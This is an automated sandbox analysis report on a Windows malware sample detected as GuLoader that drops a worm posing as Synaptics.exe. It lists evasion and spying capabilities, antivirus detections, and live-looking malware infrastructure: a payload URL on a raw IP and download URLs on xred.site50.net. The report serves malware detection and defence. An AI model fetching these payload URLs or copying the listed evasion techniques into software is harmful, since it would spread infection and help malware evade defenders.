Windows Analysis Report
SecuriteInfo.com.Variant.FakeAlert.2.24488.8627

Overview

General Information

Sample Name:	SecuriteInfo.com.Variant.FakeAlert.2.24488.8627 (renamed file extension from 8627 to exe)
Analysis ID:	634939
MD5:	c5bf732066ab84d1abba5b27638a5191
SHA1:	07b3b8a0e9008e459bd7ba727dd8380320dbc5ad
SHA256:	a4bdfb7869d435589479e095b8d0c9c2b8f987bd3a8c961424376f18c31c650f
Tags:	exe
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Antivirus detection for URL or domain

Antivirus detection for dropped file

Yara detected GuLoader

Snort IDS alert for network traffic

Found malware configuration

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Drops PE files to the document folder of the user

Tries to detect virtualization through RDTSC time measurements

Adds a directory exclusion to Windows Defender

Uses dynamic DNS services

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Contains functionality to detect sleep reduction / modifications

Antivirus or Machine Learning detection for unpacked file

Drops PE files to the application program directory (C:\ProgramData)

One or more processes crash

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Queries the installation date of Windows

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Checks if the current process is being debugged

Contains functionality to retrieve information about pressed keystrokes

Found large amount of non-executed APIs

May check if the current machine is a sandbox (GetTickCount - Sleep)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to shutdown / reboot the system

May infect USB drives

Found potential string decryption / allocating functions

Contains functionality to call native functions

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to read the clipboard data

Found dropped PE file which has not been started or loaded

Contains functionality to record screenshots

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Enables debug privileges

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to launch a program with higher privileges

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://xred.site50.net/syn/SSLLibrary.dll

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe	Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1	Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Local\Temp\RCXF979.tmp	Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\Users\user\AppData\Local\Temp\RCXF979.tmp	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\RCXF979.tmp	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\RCXCD96.tmp	Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\ProgramData\Synaptics\RCXCD96.tmp	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\Synaptics.exe	Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\ProgramData\Synaptics\Synaptics.exe	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp	Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006

Found malware configuration

Source: 00000007.00000002.532970198.00000000030C0000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://2.58.149.33/ominz_QLUnxlrvVz46.bin"}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Virustotal: Detection: 62%			Perma Link
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	ReversingLabs: Detection: 58%

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe

Avira: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1	Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 0.2.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 9.0.Synaptics.exe.400000.4.unpack	Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 9.0.Synaptics.exe.400000.4.unpack	Avira: Label: W2000M/Dldr.Agent.17651006
Source: 12.2.Synaptics.exe.400000.0.unpack	Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 12.2.Synaptics.exe.400000.0.unpack	Avira: Label: W2000M/Dldr.Agent.17651006
Source: 9.2.Synaptics.exe.400000.0.unpack	Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 9.2.Synaptics.exe.400000.0.unpack	Avira: Label: W2000M/Dldr.Agent.17651006
Source: 6.0.uniformerede.exe.4b8e14.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 6.2.uniformerede.exe.400000.0.unpack	Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 6.2.uniformerede.exe.400000.0.unpack	Avira: Label: W2000M/Dldr.Agent.17651006
Source: 9.0.Synaptics.exe.400000.2.unpack	Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 9.0.Synaptics.exe.400000.2.unpack	Avira: Label: W2000M/Dldr.Agent.17651006
Source: 0.2.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.a07634.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 9.0.Synaptics.exe.400000.0.unpack	Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 9.0.Synaptics.exe.400000.0.unpack	Avira: Label: W2000M/Dldr.Agent.17651006
Source: 6.2.uniformerede.exe.4b8e14.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 6.0.uniformerede.exe.400000.0.unpack	Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 6.0.uniformerede.exe.400000.0.unpack	Avira: Label: W2000M/Dldr.Agent.17651006
Source: 12.0.Synaptics.exe.400000.0.unpack	Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 12.0.Synaptics.exe.400000.0.unpack	Avira: Label: W2000M/Dldr.Agent.17651006
Source: 9.0.Synaptics.exe.400000.3.unpack	Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 9.0.Synaptics.exe.400000.3.unpack	Avira: Label: W2000M/Dldr.Agent.17651006
Source: 9.0.Synaptics.exe.400000.1.unpack	Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 9.0.Synaptics.exe.400000.1.unpack	Avira: Label: W2000M/Dldr.Agent.17651006

Uses 32bit PE files

Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Source: unknown	HTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49737 version: TLS 1.2

Source: C:\Users\user\Desktop\._cache_uniformerede.exe

Registry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\URBANITETENS

Jump to behavior

May infect USB drives

Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [autorun]
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [autorun]
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: autorun.inf
Source: uniformerede.exe	Binary or memory string: autorun.inf
Source: uniformerede.exe	Binary or memory string: [autorun]
Source: uniformerede.exe, 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmp	Binary or memory string: [autorun]
Source: uniformerede.exe, 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmp	Binary or memory string: [autorun]
Source: uniformerede.exe, 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmp	Binary or memory string: autorun.inf
Source: Synaptics.exe	Binary or memory string: autorun.inf
Source: Synaptics.exe	Binary or memory string: [autorun]
Source: Synaptics.exe, 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmp	Binary or memory string: [autorun]
Source: Synaptics.exe, 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmp	Binary or memory string: [autorun]
Source: Synaptics.exe, 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmp	Binary or memory string: autorun.inf
Source: Synaptics.exe	Binary or memory string: autorun.inf
Source: Synaptics.exe	Binary or memory string: [autorun]
Source: Synaptics.exe, 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmp	Binary or memory string: [autorun]
Source: Synaptics.exe, 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmp	Binary or memory string: [autorun]
Source: Synaptics.exe, 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmp	Binary or memory string: autorun.inf
Source: uniformerede.exe.0.dr	Binary or memory string: [autorun]
Source: uniformerede.exe.0.dr	Binary or memory string: [autorun]
Source: uniformerede.exe.0.dr	Binary or memory string: autorun.inf
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr	Binary or memory string: [autorun]
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr	Binary or memory string: [autorun]
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr	Binary or memory string: autorun.inf
Source: YC9w8Aif.exe.9.dr	Binary or memory string: [autorun]
Source: YC9w8Aif.exe.9.dr	Binary or memory string: [autorun]
Source: YC9w8Aif.exe.9.dr	Binary or memory string: autorun.inf
Source: ~$cache1.9.dr	Binary or memory string: [autorun]
Source: ~$cache1.9.dr	Binary or memory string: [autorun]
Source: ~$cache1.9.dr	Binary or memory string: autorun.inf
Source: RCXF979.tmp.9.dr	Binary or memory string: [autorun]
Source: RCXF979.tmp.9.dr	Binary or memory string: [autorun]
Source: RCXF979.tmp.9.dr	Binary or memory string: autorun.inf
Source: RCXCD96.tmp.6.dr	Binary or memory string: [autorun]
Source: RCXCD96.tmp.6.dr	Binary or memory string: [autorun]
Source: RCXCD96.tmp.6.dr	Binary or memory string: autorun.inf
Source: Synaptics.exe.6.dr	Binary or memory string: [autorun]
Source: Synaptics.exe.6.dr	Binary or memory string: [autorun]
Source: Synaptics.exe.6.dr	Binary or memory string: autorun.inf
Source: RCXDA77.tmp.9.dr	Binary or memory string: [autorun]
Source: RCXDA77.tmp.9.dr	Binary or memory string: [autorun]
Source: RCXDA77.tmp.9.dr	Binary or memory string: autorun.inf

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	6_2_004099E0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	6_2_00406018
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00409B1C FindFirstFileA,GetLastError,	6_2_00409B1C
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Code function: 7_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	7_2_00405D74
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Code function: 7_2_0040290B FindFirstFileW,	7_2_0040290B
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Code function: 7_2_0040699E FindFirstFileW,FindClose,	7_2_0040699E
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	9_2_004099E0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_00409B1C FindFirstFileA,GetLastError,	9_2_00409B1C
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	9_2_00406018
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	12_2_00406018
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	12_2_004099E0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_00409B1C FindFirstFileA,GetLastError,	12_2_00409B1C

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2832617 ETPRO TROJAN W32.Bloat-A Checkin 192.168.2.3:49739 -> 69.42.215.252:80

Uses dynamic DNS services

Source: unknown

DNS query: name: freedns.afraid.org

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://2.58.149.33/ominz_QLUnxlrvVz46.bin

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 69.42.215.252 69.42.215.252

Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: RCXDA77.tmp.9.dr	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp, uniformerede.exe, 00000006.00000000.272489274.00000000004A5000.00000002.00000001.01000000.00000004.sdmp, uniformerede.exe, 00000006.00000003.281465224.0000000005E21000.00000004.00000800.00020000.00000000.sdmp, ._cache_uniformerede.exe, 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp, ._cache_uniformerede.exe, 00000007.00000000.280135055.000000000040A000.00000008.00000001.01000000.00000005.sdmp, uniformerede.exe.0.dr, ._cache_uniformerede.exe.6.dr, Synaptics.exe.6.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlX
Source: RCXDA77.tmp.9.dr	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
Source: RCXDA77.tmp.9.dr	String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniD0
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
Source: RCXDA77.tmp.9.dr	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.aadrm.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.aadrm.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.cortana.ai
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.office.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.onedrive.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://augloop.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://cdn.entity.
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://clients.config.office.net/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://config.edge.skype.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://cortana.ai
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://cortana.ai/api
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://cr.office.com
Source: Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000003.344709238.00000000054EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://dev.cortana.ai
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://devnull.onenote.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://directory.services.
Source: Synaptics.exe, 00000009.00000000.370263622.0000000005DCD000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://docs.goog
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/0
